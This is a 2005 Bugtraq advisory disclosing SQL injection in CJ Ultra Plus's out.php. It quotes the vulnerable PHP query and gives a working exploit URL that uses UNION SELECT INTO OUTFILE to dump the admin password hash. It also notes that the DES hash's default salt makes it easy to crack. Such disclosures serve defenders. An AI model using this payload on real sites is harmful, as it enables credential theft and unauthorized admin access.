[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Sql Injection in CJ Ultra Plus v1.0.3-1.0.4
From: Kold <maggik () gala ! net>
Date: 2005-05-05 23:00:32
Message-ID: 20050505230032.16285.qmail () www ! securityfocus ! com
[Download RAW message or body]
#################################################
# ADVISORY #
#Sql Injection in CJ Ultra Plus v1.0.3-1.0.4(?) #
#################################################
"My God, it's full of stars" - (c) MwNN
Vulnerable code is in out.php
<---code begin-->
...
if (isset($perm)) {
$query = "select a1, a2 from trade where a1 = '$perm'"; <-muhahaha
$result = mysql_query($query);
if(!$result) error_message(sql_error());
...
<---code end---->
So...
Exploit:
/out.php?url=sad&perm=33333333333333333333333333332'%20UNION%20SELECT%20b12,b12%20FROM%20settings%20INTO%20OUTFILE%20'/path/to/ur/dir/x.txt/*
And you will get x.txt with something like that inside:
<--BEGIN-->
aaQSqAReePlq6 aaQSqAReePlq6
<___EOF___>
This is crypt()'ed in DES password for admin panel.
The SALT is 'aa' for default, so you won't get any troubles with decryption.
Greetz to: 0xdeadbabe(i luv u, br0w), foster(daddy!), mestereeo(br0w! :)), GHC, \
unl0ck(Eagalito!), raistlyn, .dtors & others.
Contact me: [maggik `at` gala `dot` net]
ISeekU: [3316667]
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic